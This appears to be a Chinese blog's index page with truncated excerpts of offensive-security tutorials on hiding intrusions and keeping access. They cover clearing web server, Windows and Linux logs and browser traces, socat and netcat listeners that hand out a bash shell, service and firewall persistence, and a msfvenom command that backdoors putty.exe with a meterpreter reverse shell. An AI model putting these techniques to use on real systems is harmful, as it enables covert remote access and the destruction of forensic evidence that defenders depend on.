robacco的博客

Web服务器日志清除IIS日志：以Windows7为例，打开控制面板中的管理工具，选择Internet信息服务（IIS）管理器 或在命令运行窗口输入InetMgr.exe。日志存放位置C:\inetpub\logs\LogFilesApache日志：Apache服务器有访问日志（access.log）和错误日志（error.log），默认安装在/var/log/apache...

清除浏览器痕迹以IE浏览器为例，痕迹的默认存放位置为：C:\Users\Ro\AppData\Local\Microsoft\Windows\Temporary Internet Files，注：该目录默认具有隐藏属性，Windows7为例，打开Windows资源管理器，在顶部左侧选择“组织”菜单，选择菜的菜单下的“文件夹和搜索选项”，在弹出的窗口中点击“查看”选项卡，勾掉“隐藏受保护的操...

socatsocat是一个多功能的网络工具，名字来源于SOcket CAT，是netcat的增强版（扩展了设计，并有新的实现）.工具下载地址：http://www.dest-unreach.org/socat/演示如何开放端口：1、如下所示，开启本地9999号端口的，并监听。以上命令表示开启监听9999端口，并将所有请求重定向到bash shell。这个命令的作用是把b...

一、windows添加开机启动项二、增加、修改系统服务配置1、windows修改注册表项：c:\download\instsrv.exe bdtest c:\download\srvany.exe实验探究：使用sc create创建一个服务。三、修改防火墙配置以ubuntu linux为例：使用命令service iptab...

一、开放连接端口1、netcat 下载地址：https://eternallybored.org/misc/netcat/（windows版本）下载解压后将文件夹路径添加到系统变量path中或切换到该工具所在文件夹运行。使用命令nc -h可查看命令帮助文档：命令参数使用说明：攻击者 连接目标： nc [-选项] [主机名] [端口]（多个端口空格隔开）被攻击端 监听端口：...

Windows痕迹清除：1、事件查看器：在命令运行窗口输入eventvwr.msc命令打开Windows事件查看器，或在控制面板 管理工具中打开事件查看器Windows事件管理工具为wevtutil.exe（https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil），攻击...

1、使用msfvenom捆绑putty.exe程序，生成后门程序bd_putty.exe。该程序与宿主程序具体相同的功能，当运行后门程序的同时，将运行攻击载荷。msfvenom -a x64 --platform windows -x /opt/putty.exe -k -p windows/x64/meterpreter_reverse_tcp lhost=192.168.57.128 l...

Linux 日志文件一般包括如下：(1) /var/log/messages：每一行包含日期、主机名、程序名，接着是PID或内核标识，最后是消息；文本文件(2) /var/log/wtmp：永久记录每个用户登录、注销及系统的启动和关机事件，用来查看用户的登录记录，last命令通过访问这个文件获得信息；二进制文件，使用last命令查看(3) /var/run/utmp：记录有关当前登录的...